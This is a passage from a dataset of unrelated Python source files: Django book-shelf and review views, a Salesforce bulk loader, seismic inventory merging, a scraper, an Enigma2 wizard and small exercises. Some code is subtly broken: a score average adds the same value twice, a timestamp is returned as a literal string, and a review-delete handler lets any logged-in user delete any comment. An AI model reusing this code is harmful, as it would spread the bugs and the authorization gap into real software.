visitedBooks\n\n\tshelf = {\n\t\t\"inFavourites\": True if request.user in book.isFavourite.all() else False,\n\t\t\"inReadingNow\": True if request.user in book.readingNow.all() else False,\n\t\t\"inToRead\": True if request.user in book.toRead.all() else False,\n\t\t\"inHaveRead\": True if request.user in book.haveRead.all() else False,\n\t}\n\t\n\tcontext = {\n\t\t\"book\": book,\n\t\t\"shelf\": shelf,\n\t\t\"similarBooks\": similarBooks(book),\n\t}\n\treturn render(request, \"book/bookPage.html\", context)\n\n@login_required\ndef bookShelf(request):\n\n\tfavouriteBooks = Book.objects.filter(isFavourite=request.user)\n\treadingNowBooks = Book.objects.filter(readingNow=request.user)\n\ttoReadBooks = Book.objects.filter(toRead=request.user)\n\thaveReadBooks = Book.objects.filter(haveRead=request.user)\n\n\tif 'visitedBooks' not in request.session:\n\t\trequest.session['visitedBooks'] = []\n\n\tcontext = {\n\t\t\"favouriteBooks\": favouriteBooks,\n\t\t\"readingNowBooks\": readingNowBooks,\n\t\t\"toReadBooks\": toReadBooks,\n\t\t\"haveReadBooks\": haveReadBooks,\n\t\t\"visitedBooks\": [ Book.objects.get(isbn13=isbn) for isbn in request.session['visitedBooks'] ],\n\t\t\"personalizedBooks\": []\n\t}\n\treturn render(request, \"book/bookShelf.html\", context)\t\n\ndef getBookReviews(request, *args, **kwargs):\n\n\tbookReviews = BookReview.objects.filter(book__isbn13=kwargs['isbn_13']).prefetch_related('likes', 'dislikes').select_related('creator')\n\n\tif kwargs['orderBy'] == 'NewestFirst':\n\t\tbookReviews = bookReviews.order_by('-createdTime')\n\t\tbookReviewsSplit = [bookReviews[i:i + 15] for i in range(0, len(bookReviews), 15)]\n\n\telif kwargs['orderBy'] == 'OldestFirst':\n\t\tbookReviews = bookReviews.order_by('createdTime')\n\t\tbookReviewsSplit = [bookReviews[i:i + 15] for i in range(0, len(bookReviews), 15)]\n\n\telif kwargs['orderBy'] == 'TopReview':\n\t\tbookReviews = sortBookCommentsByLike( bookReviews )\n\t\tbookReviewsSplit = [bookReviews[i:i + 15] for i in range(0, len(bookReviews), 15)]\n\n\ttry:\n\t\tbookReviewsSplitList = bookReviewsSplit[int(kwargs['pagination'])]\n\texcept IndexError:\n\t\tresponse = {\n\t\t\t\"error\": \"IndexError\"\n\t\t}\n\t\treturn HttpResponse(json.dumps(response), content_type=\"application/json\")\n\n\tnewBookReviewsList = [\n\t\t{\n\t\t\t'pk': c.pk,\n\t\t\t'fullName': c.creator.get_full_name(),\n\t\t\t'edited': c.edited,\n\t\t\t'description': c.description,\n\t\t\t'likeCount': c.likes.count(),\n\t\t\t'dislikeCount': c.dislikes.count(),\n\t\t\t'canEdit': c.creator.pk == request.user.pk,\n\t\t\t'createdTime': 'c.createdTime',\n\t\t\t'elapsed': naturaltime(c.createdTime),\n\t\t\t'stars': c.getRatingToStar(),\n\t\t}\n\n\t\tfor c in bookReviewsSplitList\n\t]\n\n\tresponse = {\n\t\t'newBookReviewsList': newBookReviewsList\n\t}\n\treturn JsonResponse(response, status=200)\n\ndef updateShelf(request, *args, **kwargs):\n\t\"\"\"\n\t\tUser adds or removes book from their shelf.\n\t\"\"\"\n\timport time\n\tstart_time = time.time()\n\tif not request.user.is_authenticated:\n\t\tresponse = {\n\t\t\t\"action\": False,\n\t\t\t\"message\": \"Login to perform this action.\"\n\t\t}\n\t\treturn JsonResponse(response, status=401)\n\n\tif not request.is_ajax() or kwargs['isbn_13'] == None or kwargs['shelf_type'] == None:\n\t\tresponse = {\n\t\t\t\"action\": False,\n\t\t\t\"message\": \"Unable to perform action at this time.\"\n\t\t}\n\t\treturn JsonResponse(response, status=400)\n\n\tbook = Book.objects.get(isbn13=kwargs['isbn_13'])\n\tshelf = {}\n\n\tif request.is_ajax() and request.method == \"POST\":\n\t\tif kwargs['shelf_type'] == 'favourites':\n\t\t\tshelf['inFavourites'] = book.updateIsFavourite(request)\n\t\t\t\n\t\telif kwargs['shelf_type'] == 'readingNow':\n\t\t\tshelf['inReadingNow'] = book.updateReadingNow(request)\n\n\t\telif kwargs['shelf_type'] == 'toRead':\n\t\t\tshelf['inToRead'] = book.updateToRead(request)\n\n\t\telif kwargs['shelf_type'] == 'haveRead':\n\t\t\tshelf['inHaveRead'] = book.updateHaveRead(request)\n\n\tresponse = {\n\t\t\"action\": True,\n\t\t\"message\": \"\",\n\t\t\"shelf\": shelf\n\t}\n\tprint(\"--- %s seconds ---\" % (time.time() - start_time))\n\treturn JsonResponse(response, status=200)\n\ndef bookComment(request, *args, **kwargs):\n\t\"\"\"\n\t\tUser can create, update and delete comments for a particular book.\n\t\"\"\"\n\t# TODO: if requests can be categorised in request.method then remove kwargs['action'] from url.\n\tif not request.user.is_authenticated:\n\t\tresponse = {\n\t\t\t\"action\": False,\n\t\t\t\"message\": \"Login to perform this action.\"\n\t\t}\n\t\treturn JsonResponse(response, status=401)\n\n\tif not request.is_ajax() or kwargs['isbn_13'] == None or kwargs['action'] == None:\n\t\tresponse = {\n\t\t\t\"action\": False,\n\t\t\t\"message\": \"Unable to perform action at this time.\"\n\t\t}\n\t\treturn JsonResponse(response, status=400)\n\n\tbook = Book.objects.get(isbn13=kwargs['isbn_13'])\n\n\tif request.is_ajax() and request.method.lower() == \"delete\":\n\t\tbody = QueryDict(request.body)\n\t\tcommentId = body.get(\"commentId\")\n\t\tBookReview.objects.filter(id=commentId).delete()\n\n\t\tresponse = {\n\t\t\t\"action\": True,\n\t\t}\n\t\treturn JsonResponse(response, status=200)\n\n\tif request.is_ajax() and request.method == \"PUT\":\n\t\tbody = QueryDict(request.body)\n\t\tcommentId = body.get(\"commentId\")\n\t\tfunctionality = body.get(\"functionality\")\n\n\t\tbookReview = BookReview.objects.get(id=commentId)\n\n\t\tif functionality == 'likeComment':\n\t\t\tbookReview.likeBookReview(request)\n\n\t\tif functionality == 'dislikeComment':\n\t\t\tbookReview.dislikeBookReview(request)\n\n\t\tresponse = {\n\t\t\t\"action\": True,\n\t\t\t\"likeCount\": bookReview.likes.count(),\n\t\t\t\"dislikeCount\": bookReview.dislikes.count()\n\t\t}\n\t\treturn JsonResponse(response, status=200)\n\n\tif request.is_ajax() and request.method == \"POST\":\n\t\tif kwargs['action'] == 'create':\n\t\t\tbody = QueryDict(request.body)\n\t\t\tnewComment = body.get(\"newComment\")\n\t\t\tstarCount = body.get(\"starCount\")\n\n\t\t\tbookReview = BookReview.objects.create(\n\t\t\t\tbook = book,\n\t\t\t\tcreator = request.user,\n\t\t\t\tdescription = newComment,\n\t\t\t\trating = starCount,\n\t\t\t)\n\n\t\t\tnewRatingsCount = book.cleanData['ratingsCount'] + 1\n\t\t\tnewRatingPointsSum = book.cleanData['ratingsCount']*book.cleanData['averageRating'] + starCount\n\t\t\tnewAverageRating = round(newRatingPointsSum/newRatingsCount, 1)\n\n\t\t\tbook.cleanData['ratingsCount'] = newRatingsCount\n\t\t\tbook.unCleanData['ratingsCount'] = newRatingsCount\n\n\t\t\tbook.cleanData['averageRating'] = newAverageRating\n\t\t\tbook.unCleanData['averageRating'] = newAverageRating\n\t\t\tbook.save()\n\n\t\t\tresponse = {\n\t\t\t\t\"action\": True,\n\t\t\t\t\"bookReview\": {\n\t\t\t\t\t'pk': bookReview.pk,\n\t\t\t\t\t'full_name': bookReview.creator.get_full_name(),\n\t\t\t\t\t'edited': bookReview.edited,\n\t\t\t\t\t'description': bookReview.description,\n\t\t\t\t\t'like_count': 0,\n\t\t\t\t\t'dislike_count': 0,\n\t\t\t\t\t'can_edit': True,\n\t\t\t\t\t'elapsed': naturaltime(bookReview.createdTime),\n\t\t\t\t},\n\t\t\t}\n\t\t\treturn JsonResponse(response, status=200)\n\n\t\telif kwargs['action'] == 'update':\n\t\t\tpass\n\n\t\telif kwargs['action'] == 'delete':\n\t\t\tpass\n\n\treturn JsonResponse({}, status=200)\n\ndef recentlyAddedBooks():\n\tallBooks = Book.objects.all()\n\ttop20Books = allBooks[len(allBooks)-20:] if len(allBooks)>20 else allBooks[:]\n\t\n\trecentlyAddedBooks = [\n\t\t{\n\t\t\t\"isbn13\": i.isbn13,\n\t\t\t\"title\": i.unCleanData['title'],\n\t\t\t\"thumbnail\": i.unCleanData['thumbnail']\n\t\t}\t\n\t\tfor i in top20Books\n\t]\n\treturn recentlyAddedBooks\n\ndef booksBasedOnRatings():\n\tallBooks = Book.objects.all().prefetch_related('isFavourite')\n\n\tif len(allBooks) == 0:\n\t\treturn []\n\n\tdictBooks = {}\n\tfor i in allBooks:\n\n\t\tdictBooks[i.unCleanData[\"isbn13\"]] = {\n\t\t\t\"isbn13\": i.unCleanData[\"isbn13\"],\n\t\t\t\"title\": i.unCleanData['title'],\n\t\t\t\"thumbnail\": i.unCleanData['thumbnail']\n\t\t}\n\n\t\ti.cleanData.pop(\"description\")\n\t\ti.cleanData.pop(\"isbn10\")\n\t\ti.cleanData.pop(\"thumbnail\")\n\t\ti.cleanData.pop(\"uid\")\n\t\ti.cleanData[\"favouritesCount\"] = i.isFavourite.count()\n\n\tallBooksCleaned = [i.cleanData for i in allBooks]\n\n\t# Implementing weighted average for each book's average rating // Non - personalized\n\n\tdf = pd.DataFrame(allBooksCleaned)\n\n\tv = df['ratingsCount']\n\tR = df['averageRating']\n\tC = df['averageRating'].mean()\n\tm = df['ratingsCount'].quantile(0.70)\n\n\tdf['weightedAverage'] = ((R*v) + (C*m))/(v+m)\n\n\t# This is for recommending books to the users based on scaled weighting (50%) and favouritesCount (50%).\n\tscaling = MinMaxScaler()\n\tbookScaled = scaling.fit_transform(df[['weightedAverage', 'favouritesCount']])\n\tbookNormalized = pd.DataFrame(bookScaled, columns=['weightedAverage', 'favouritesCount'])\n\n\tdf[['normalizedWeightAverage','normalizedPopularity']] = bookNormalized\n\tdf['score'] = df['normalizedWeightAverage'] * 0.5 + df['normalizedPopularity'] * 0.5\n\tbooksScoredFromDf = df.sort_values(['score'], ascending=False)\n\tfinalResult = list(booksScoredFromDf[['isbn13']].head(15)['isbn13'])\n\n\treturn [ dictBooks[isbn] for isbn in finalResult ]\n\ndef similarBooks(book):\n\t\"\"\"\n\t\tMake recommendations based on the books’s description.\n\t\"\"\"\n\tallBooks = Book.objects.all().prefetch_related('isFavourite')\n\n\tif len(allBooks) == 0 or not isinstance(book, Book):\n\t\treturn []\n\n\tdictBooks = {}\n\n\tfor i in allBooks:\n\n\t\tdictBooks[i.unCleanData[\"isbn13\"]] = {\n\t\t\t\"isbn13\": i.unCleanData[\"isbn13\"],\n\t\t\t\"title\": i.unCleanData['title'],\n\t\t\t\"thumbnail\": i.unCleanData['thumbnail']\n\t\t}\n\n\t\ti.cleanData.pop(\"authors\")\n\t\ti.cleanData.pop(\"averageRating\")\n\t\ti.cleanData.pop(\"genre\")\n\t\ti.cleanData.pop(\"isbn10\")\n\t\ti.cleanData.pop(\"publishedDate\")\n\t\ti.cleanData.pop(\"publisher\")\n\t\ti.cleanData.pop(\"ratingsCount\")\n\t\ti.cleanData.pop(\"thumbnail\")\n\t\ti.cleanData.pop(\"uid\")\n\n\tallBooksCleaned = [i.cleanData for i in allBooks]\n\n\tdf = pd.DataFrame(allBooksCleaned)\n\n\ttfidfVectorizer = TfidfVectorizer(\n\t\tmin_df=3, \n\t\tmax_features=None,\n\t\tstrip_accents='unicode',\n\t\tanalyzer='word',\n\t\ttoken_pattern=r'\\w{1,}',\n\t\tngram_range=(1, 3),\n\t\tstop_words = 'english'\n\t)\n\n\tdf['description'] = df['description'].fillna('')\n\ttfvMatrix = tfidfVectorizer.fit_transform(df['description'])\n\tsigmoid = sigmoid_kernel(tfvMatrix, tfvMatrix)\n\tindices = pd.Series(df.index, index=df['title']).drop_duplicates()\n\n\tdef giveRecommendation(title, sigmoid=sigmoid):\n\t try:\n\t idx = indices[title].iloc[0]\n\t except:\n\t \t# couldn't catch specific exception dur to 'numpy.int64' object has no attribute 'iloc'\n\t idx = indices[title]\n\n\t sigmoidScores = list(enumerate(sigmoid[idx]))\n\t sigmoidScores = sorted(sigmoidScores, key=lambda x: x[1], reverse=True)\n\t sigmoidScores = sigmoidScores[1:11]\n\t bookIndices = [i[0] for i in sigmoidScores]\n\t return df['isbn13'].iloc[bookIndices]\n\n\tfinalResult = list(giveRecommendation(book.cleanData['title']))\n\treturn [ dictBooks[isbn] for isbn in finalResult ]\n\ndef favouriteBooksFromSimilarUsers(request):\n\t\"\"\"\n\t\tReturn list of other favourite books from similar user(s).\n\t\tAttributes to determine the similarity: list of favourite books from each user.\n\t\"\"\"\n\tif not request.user.is_authenticated or request.user.is_superuser:\n\t\treturn []\n\n\totherProfiles = Profile.objects.select_related('user').prefetch_related('favouriteGenres').all()\n\tuserGenreIds = [i.pk for i in request.user.profile.favouriteGenres.all()]\n\t\n\tif len(userGenreIds) == 0:\n\t\treturn\n\n\tsimilarityScores = [\n\t\t{\n\t\t\t'userId': p.user.id,\n\t\t\t'similarityScore': difflib.SequenceMatcher(None, userGenreIds, [i.pk for i in p.favouriteGenres.all()] ).ratio()\n\t\t}\n\t\tfor p in otherProfiles if p.user != request.user\n\t]\n\n\tdf = pd.DataFrame(similarityScores)\n\ttopFiveUsers = df.sort_values(by=['similarityScore'], ascending=False).head(5)\n\ttopFiveUserObjects = User.objects.filter(pk__in=list(topFiveUsers['userId']))\n\n\tbookList = Book.objects.filter(isFavourite__in=topFiveUserObjects).exclude(isFavourite=request.user)\n\tbooks = bookList[:20] if len(bookList) > 20 else bookList[:]\n\n\tfavouriteBooks = [\n\t\t{\n\t\t\t\"isbn13\": i.unCleanData[\"isbn13\"],\n\t\t\t\"title\": i.unCleanData['title'],\n\t\t\t\"thumbnail\": i.unCleanData['thumbnail']\n\t\t}\n\t\tfor i in books\n\t]\n\n\treturn favouriteBooks\n\ndef sortBookCommentsByLike(bookReviews):\n\t\"\"\"\n\t\tReturn the existing book review list by most popular comment made by a user.\n\t\tAttributes to determine the popularity:\n\t\t\tlikes and dislikes\n\t\"\"\"\n\n\tif len(bookReviews) == 0:\n\t\treturn []\n\n\tbookReviewsDict = [\n\t\t{\n\t\t\t'id': b.pk,\n\t\t\t'likeCount': b.likes.count(),\n\t\t\t'dislikeCount': b.dislikes.count(),\n\t\t}\n\t\tfor b in bookReviews\n\t]\n\n\tdf = pd.DataFrame(bookReviewsDict)\n\tscaling = MinMaxScaler()\n\tdivedent = 100/2\n\n\tbookReviewsScaled = scaling.fit_transform(df[['likeCount', 'dislikeCount']])\n\tbookReivewNormalized = pd.DataFrame(bookReviewsScaled, columns=['likeCount', 'dislikeCount'])\n\n\tdf[['normalizedlikeCount','normalizeddislikeCount']]= bookReivewNormalized\n\tdf['score'] = df['normalizedlikeCount'] * divedent+ df['normalizeddislikeCount'] * divedent\n\n\tbookReviewDf = df.sort_values(['score'], ascending=False)\n\tbookReviewId = list(bookReviewDf['id'])\n\treturn [j for i in bookReviewId for j in bookReviews if i == j.pk]","sub_path":"book/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"564632482","text":"class BaseField(object):\n def __init__(self, id, settings, form):\n self.id = id\n self.settings = settings\n self.form = form\n\n def render(self, doc=None, edit=False):\n if doc:\n field_value = doc.get_item(self.id)\n else:\n field_value = self.form.compute_field(self.id, context=self.form)\n if not field_value:\n field_value = ''\n if edit:\n return self.edit_template.format(id=self.id, value=field_value)\n else:\n return self.read_template.format(id=self.id, value=field_value)\n\nclass TextField(BaseField):\n\n read_template = \"\"\"{value}\"\"\"\n edit_template = \"\"\"\"\"\"\n\nclass DatetimeField(BaseField):\n\n read_template = \"\"\"{value}\"\"\"\n edit_template = \"\"\"\"\"\"\n\n","sub_path":"rapido/core/fields/fields.py","file_name":"fields.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"186263127","text":"# Nhập vào giá trị 1 và 2\nvalue1 = input(\"첫번째 과목 점수를 입력하세요: \") \nvalue2 = input(\"두번째 과목 점수를 입력하세요: \")\n\nvalue1 = int(value1) # 문자열 value1을 정수로 변환. 형변환\nvalue2 = int(value2) # 문자열 value1을 정수로 변환. 형변환\n\nsum = value2 + value2 # 합꼐\naverage = sum / 2 # 평균\n\nprint(\"-\" * 10) \n# 점수 평균은 >= 95이면 Very Good을 출력하고 <95이면 Just Good을 출력해요\nif average >= 95 :\n print(\" Very Good\")\nelse :\n print(\"Just Good\")\nprint(\"-\" * 10) # ----------","sub_path":"st01.Python기초/py02프로그래밍기초/py02_09ex3_average.py","file_name":"py02_09ex3_average.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"497410182","text":"\"\"\"\nНапишите генератор, возвращающий бесконечную последовательность чисел из треугольника Паскаля.\nСдавать нужно только код самого генератора, тестирующий код импортирует его и прогонит набор тестов.\nПоследовательность, возвращаемая генератором, должна выглядеть так:\n1 1 1 1 2 1 1 3 3 1 1 4 6 4 1 1 5 10 10 5 1 1 6 15 20 15 6 1 1 7 21 35 35 21 7 1 1 8 28 56 70 56 28 8 1 1 9 36 84 126 126 84 36 9 1 ...\n\nФормат ввода\nТребуется реализовать генератор в виде функции без аргументов с именем pascal_triangle.\nТекст програмы должен содержать генератор pascal_triangle и все необходимые импорты.\n\nФайл с решением должен называться solution.py\n\"\"\"\n\ndef pascal_triangle():\n line = 0\n prevLine = [0, 1, 0]\n newLine = [0, 0]\n if line == 0:\n yield 1\n line += 1\n while True:\n for i in range(line + 1):\n newLine.insert(i+1, prevLine[i]+prevLine[i+1])\n yield newLine[i+1]\n prevLine = newLine.copy()\n newLine = [0, 0]\n line += 1\n","sub_path":"Contest4/TaskA.py","file_name":"TaskA.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"55768259","text":"import json\r\nfrom salesforce_bulk import SalesforceBulk\r\nfrom salesforce_bulk.util import IteratorBytesIO\r\nfrom time import sleep\r\nfrom salesforce_bulk import CsvDictsAdapter\r\nimport pandas as pd \r\nimport config as cfg\r\n#Authentication\r\n\r\nbulk = SalesforceBulk(username=cfg.USERNAME, \r\n\tpassword=cfg.PASSWORD, \r\n\tsecurity_token=cfg.SECURITY_KEY, sandbox=True)\r\n\r\n#Source CSV File path for Account\r\ninput_file = \"/home/baadmin/NCT_ETL/input_files/pg_extract_prd/staging_account_household.csv\"\r\n\r\n#Target SFDC Object name\r\ntarget_obj = \"Account\"\r\n\r\n# Mapping of Input csv Fields to SalesForce Fields\r\n\r\n\r\n\r\nsf_mapping = {'accountnumber': 'AccountNumber',\r\n 'accountname': 'Name',\r\n 'accountkey': 'account_Key__c',\r\n 'branchcode': 'Branch_Code__c',\r\n 'branchkey': 'Branch_Key__c',\r\n 'billingstreet': 'Mailing_Street__c',\r\n 'billingcity': 'Mailing_City__c',\r\n 'billingstate': 'Mailing_State__c',\r\n 'billingcountry': 'Mailing_Country__c',\r\n 'billingpostcode': 'Mailing_Postal_Code__c',\r\n 'billinglatitude': 'Mailing_Latitude__c',\r\n 'billinglongitude': 'Mailing_Longtitude__c',\r\n 'psaoffice': 'PSA_Area_Code__c',\r\n 'mobilephone': 'Mobile__c',\r\n 'description': 'description',\r\n 'phone': 'phone',\r\n 'record_type_id': 'RecordTypeId',\r\n 'owner_': 'OwnerId',\r\n 'branch': 'Branch__c',\r\n 'datasource': 'Data_Source__c'\r\n\r\n }\r\n\r\n\r\n# Read the input file in batches and upload to SalesForce\r\nfor gm_chunk in pd.read_csv(input_file, chunksize=200, encoding=\"ISO-8859-1\"): #200-10000\r\n\r\n input_slice = gm_chunk[list(sf_mapping.keys())].rename(columns=sf_mapping)\r\n input_processed = input_slice.where((pd.notnull(input_slice)), None)\r\n\r\n job = bulk.create_insert_job(target_obj, contentType='CSV')\r\n records = input_processed.to_dict('records')\r\n csv_iter = CsvDictsAdapter(iter(records))\r\n batch = bulk.post_batch(job, csv_iter)\r\n bulk.wait_for_batch(job, batch)\r\n bulk.close_job(job)\r\n print(\"Done. Accounts uploaded 200.\") #200->10000\r\n break #ishi\r\n\r\nprint(\"Done. All Accounts uploaded\")\r\n","sub_path":"10_Account_household_bulk_load.py","file_name":"10_Account_household_bulk_load.py","file_ext":"py","file_size_in_byte":2296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"340795373","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nUtilities for dealing with inventory objects.\n\"\"\"\nfrom __future__ import (absolute_import, division, print_function,\n unicode_literals)\n\n\ndef combine_inventories(inv_list):\n \"\"\"\n Takes a list of inventories and recursively merges them together.\n\n Returns a single merged Inventory object. The original list of\n inventories is not changes.\n\n :param inv_list: List. The list of Inventory objects to\n be merged together\n \"\"\"\n if len(inv_list) == 1:\n inv = inv_list.pop()\n return inv\n elif len(inv_list) > 1:\n inv_a = inv_list.pop()\n inv_b = inv_list.pop()\n inv_list.insert(0, merge_inventories(inv_a, inv_b))\n return combine_inventories(inv_list)\n else:\n return None\n\n\ndef merge_inventories(inv_a, inv_b):\n \"\"\"\n Takes two inventories, merges the contents of both.\n\n Returns the combined inventory object without duplicates.\n The original inventories will not be changed.\n\n :param inv_a: Inventory A. Contents of that inventory will be prioritized.\n :type inv_a: :class:`~obspy.core.inventory.inventory.Inventory`\n :param inv_b: Inventory B.\n :type inv_b: :class:`~obspy.core.inventory.inventory.Inventory`\n \"\"\"\n inv_a_networks = []\n inv_a_stations = []\n inv_a_channels = []\n for net_a in inv_a:\n inv_a_networks.append(net_a.alternate_code)\n for sta_a in net_a.stations:\n inv_a_stations.append(sta_a.code)\n for cha_a in sta_a.channels:\n inv_a_channels.append({'channel': cha_a.code,\n 'location': cha_a.location_code,\n 'start_date': cha_a.start_date\n .strftime(\"%Y-%m-%dT%H:%M:%S.%f\"),\n 'end_date': cha_a.end_date\n .strftime(\"%Y-%m-%dT%H:%M:%S.%f\")\n })\n for net_b in inv_b:\n if net_b.alternate_code not in inv_a_networks: # check networks\n inv_a.networks.append(net_b)\n else: # network exists in both inventories, check stations\n for sta_b in net_b:\n if sta_b.code not in inv_a_stations:\n for net_a in inv_a:\n if net_a.code == net_b.code:\n net_a.stations.append(sta_b)\n else: # station exists in both inventories, check channels\n for cha_b in sta_b.channels:\n cha_b_dict = {'channel': cha_b.code,\n 'location': cha_b.location_code,\n 'start_date': cha_b.start_date\n .strftime(\"%Y-%m-%dT%H:%M:%S.%f\"),\n 'end_date': cha_b.end_date\n .strftime(\"%Y-%m-%dT%H:%M:%S.%f\")}\n # channel b not in station a channels\n if not [cha_a_dict for cha_a_dict in inv_a_channels\n if (cha_a_dict == cha_b_dict)]:\n for net_a in inv_a:\n if net_a.code == net_b.code:\n for sta_a in net_a.stations:\n if sta_a.code == sta_b.code:\n sta_a.channels.append(cha_b)\n return inv_a\n\n\ndef sort_inventory(inv):\n \"\"\"\n Returns a sorted inventory in network, station, location, channel,\n starttime, endtime order\n\n :param inv: Inventory. The Inventory object to sort.\n :returns: A sorted Inventory object.\n \"\"\"\n inv.networks.sort(key=lambda x: x.code)\n for network in inv.networks:\n network.stations.sort(key=lambda x: x.code)\n for station in network.stations:\n station.channels.sort(key=lambda x:\n \"{0}{1}{2}{3}\".format(x.location_code,\n x.code,\n x.start_date,\n x.end_date))\n return inv\n","sub_path":"PH5WebService/common/inventory_utils.py","file_name":"inventory_utils.py","file_ext":"py","file_size_in_byte":4293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"495645819","text":"import requests\r\nfrom lxml import etree\r\n\r\ndef spider(url:str):\r\n my_headers = {\r\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.104 Safari/537.36',\r\n }\r\n request = requests.get(url=url, headers=my_headers)\r\n content = request.text\r\n\r\n res = parse_content(content)\r\n\r\ndef parse_content(text: str):\r\n sel = etree.HTML(text)\r\n content = sel.xpath(\"//div[@class='content']/text()\")\r\n final_content = \"\"\r\n for item in content:\r\n final_content += item.replace(\"\\t\", \"\")\r\n\r\n print(\"final\", final_content)\r\n\r\n return content\r\n\r\ndef run_spider(url:str):\r\n spider(url=url)\r\n\r\n\r\nif __name__ == '__main__':\r\n target_url = \"http://gongwen.1kejian.com/show-26-93077-1.html\"\r\n spider(url=target_url)\r\n","sub_path":"article_spider/article_spider/spider_perpage/page_spider.py","file_name":"page_spider.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"252443149","text":"# -*- coding: utf-8 -*-\n\nfrom os import environ\n\nfrom Components.config import config\nfrom Components.Label import Label\nfrom Components.Pixmap import Pixmap\nfrom Screens.Wizard import WizardSummary\nfrom Screens.WizardLanguage import WizardLanguage\n\nfrom StillPicture import StillPicture\n\nfrom Plugins.Extensions.ProjectValerie.DMC_Plugins.DMC_SyncExtras.Config import SyncConfig\nfrom Plugins.Extensions.ProjectValerie.__common__ import printl2 as printl\n\n#------------------------------------------------------------------------------------------\n\nclass PVMC_Wizard(WizardLanguage):\n\n\tdef __init__(self, session):\n\t\tif environ[\"LANGUAGE\"] == \"de\":\n\t\t\tself.xmlfile = config.plugins.pvmc.pluginfolderpath.value + \"DMC_Wizard_DE.xml\"\n\t\telse:\n\t\t\tif environ[\"LANGUAGE\"] == \"de_DE\":\n\t\t\t\tself.xmlfile = config.plugins.pvmc.pluginfolderpath.value + \"DMC_Wizard_DE.xml\"\n\t\t\telse:\n\t\t\t\tself.xmlfile = config.plugins.pvmc.pluginfolderpath.value + \"DMC_Wizard.xml\"\n\t\t\n\t\tWizardLanguage.__init__(self, session, showSteps = False, showStepSlider = False)\n\t\tself[\"wizard\"] = Pixmap()\n\t\tself[\"textTop\"] = Label()\n\t\tself[\"textCenter\"] = Label()\n\t\tself[\"textBottom\"] = Label()\n\t\t\n\t\tself[\"showiframe\"] = StillPicture(session)\n\n\tdef autostart(self, selection = None):\n\t\tif selection is None:\n\t\t\tselection = self.selection\n\t\tif selection == \"yes\":\n\t\t\tconfig.plugins.pvmc.autostart.value = True\n\t\telse:\n\t\t\tconfig.plugins.pvmc.autostart.value = False\n\t\tprintl(\"-> \" + str(config.plugins.pvmc.autostart.value), self)\n\n\tdef checkforupdate(self, selection = None):\n\t\tif selection is None:\n\t\t\tselection = self.selection\n\t\tif selection == \"yes\":\n\t\t\tconfig.plugins.pvmc.checkforupdate.value = \"Active\"\n\t\telse:\n\t\t\tconfig.plugins.pvmc.checkforupdate.value = \"Passive\"\n\t\tprintl(\" -> \" + str(config.plugins.pvmc.checkforupdate.value), self)\n\n\tdef uselocal(self, selection = None):\n\t\tif selection is None:\n\t\t\tselection = self.selection\n\t\tif selection == \"yes\":\n\t\t\tconfig.plugins.pvmc.uselocal.value = True\n\t\telse:\n\t\t\tconfig.plugins.pvmc.uselocal.value = False\n\t\tprintl(\"-> \" + str(config.plugins.pvmc.uselocal.value), self)\n\n\tdef language(self, selection = None):\n\t\tlang = \"en\"\n\t\tif selection is None:\n\t\t\tselection = self.selection\n\t\t\t\n\t\tif len(selection) == 2:\n\t\t\tlang = selection\n\t\t\n\t\tSyncConfig().getInstance().set(\"local\", lang)\n\t\tSyncConfig().getInstance().save()\n\n\tdef saveConfig(self):\n\t\tprintl(\"->\", self)\n\t\tconfig.plugins.pvmc.showwizard.value = False\n\t\tconfig.save() \n\t\tprintl(\"<- Saved !\", self)\n\n\tdef finishUp(self):\n\t\tprintl(\"->\", self)\n\t\tself[\"showiframe\"].finishStillPicture()\n","sub_path":"ValerieMediaCenter/DMC_Wizard.py","file_name":"DMC_Wizard.py","file_ext":"py","file_size_in_byte":2556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"586456239","text":"from connections.Connection import Connection\nfrom utils.FileProcessors import FileProcessor\nimport utils.Logger as logger\n\n__author__ = 'dur'\nTICKET_PARAM = \"ticketServer\"\nSKIP_TICKETS = \"skipTickets\"\nEXPECTED_TICKET = \"expectedTicket\"\nNAME = \"TicketUtil: \"\n\n\ndef getTicket():\n\tconnection = Connection(\"/home/dur/Projects/ServerSide/config/connection_config.conf\")\n\tparams = readTempVars()\n\tconnection.connect(params[TICKET_PARAM], 80, \"/ticket\")\n\treturn connection.get_message()\n\n\ndef readTempVars():\n\ttempProcessor = FileProcessor(\"/home/dur/Projects/ServerSide/config/tempParams.conf\")\n\ttempProcessor.lockFile()\n\tparams = tempProcessor.readFile()\n\ttempProcessor.unlockFile()\n\treturn params\n\n\ndef setNextExpectedTicket(currentTicket):\n\tlogger.logInfo(NAME + \"Otrzymalem aktualny bilet \" + str(currentTicket))\n\ttempProcessor = FileProcessor(\"/home/dur/Projects/ServerSide/config/tempParams.conf\")\n\ttempProcessor.lockFile()\n\tparams = tempProcessor.readFile()\n\tif params[SKIP_TICKETS] != '':\n\t\tskipped = params[SKIP_TICKETS].split(\",\")\n\telse:\n\t\tskipped = None\n\tnewTicket = int(currentTicket) + 1\n\tskipped = removeAllSkippedLowerThen(skipped, newTicket)\n\twhile skipped.__contains__(str(newTicket)):\n\t\tskipped.remove(str(newTicket))\n\t\tnewTicket = int(newTicket) + 1\n\ttoRet = \"\"\n\tfor single in skipped:\n\t\ttoRet= toRet + str(single) + \",\"\n\ttoRet = toRet[:-1]\n\tparams[EXPECTED_TICKET] = str(newTicket)\n\tparams[SKIP_TICKETS] = 